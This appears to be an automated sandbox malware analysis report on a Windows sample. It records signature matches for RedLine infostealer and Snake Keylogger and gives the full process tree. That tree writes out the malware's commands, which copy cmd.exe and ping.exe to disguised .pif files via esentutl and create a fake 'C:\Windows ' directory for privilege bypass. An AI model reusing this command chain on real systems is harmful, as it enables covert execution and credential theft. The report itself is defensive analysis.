            Source: 00000017.00000001.1460585249.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000001A.00000002.2505611445.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000017.00000002.2505730658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000001A.00000001.1548998614.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/11@5/5
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B17FD2 GetDiskFreeSpaceA,0_2_02B17FD2
            Source: C:\Users\Public\Libraries\yihfsboC.pif Code function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Code function: 0_2_02B26DC8 CoCreateInstance,0_2_02B26DC8
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe File created: C:\Users\Public\Libraries\PNO
            Source: C:\Users\Public\Libraries\yihfsboC.pif Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
            Source: C:\Users\Public\Libraries\yihfsboC.pif Command line argument: 08A14_2_00413780
            Source: C:\Users\Public\Libraries\yihfsboC.pif Command line argument: 08A23_2_00413780
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: yihfsboC.pif, 0000000E.00000002.2540746609.000000002715E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.00000000349EF000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.00000000349E1000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A2B000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.00000000349D1000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A38000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2546648768.0000000035A4C000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2537622019.0000000029A0B000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289E7000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.000000002899D000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: EPTMAcgvNZ.exe ReversingLabs: Detection: 63%
            Source: EPTMAcgvNZ.exe Virustotal: Detection: 71%
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe File read: C:\Users\user\Desktop\EPTMAcgvNZ.exe
            Source: unknown Process created: C:\Users\user\Desktop\EPTMAcgvNZ.exe "C:\Users\user\Desktop\EPTMAcgvNZ.exe"
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /o
            Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Process created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            Source: unknown Process created: C:\Users\Public\Libraries\Cobsfhiy.PIF "C:\Users\Public\Libraries\Cobsfhiy.PIF"
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Process created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: unknown Process created: C:\Users\Public\Libraries\Cobsfhiy.PIF "C:\Users\Public\Libraries\Cobsfhiy.PIF"
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIF Process created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: url.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: ieframe.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: netapi32.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
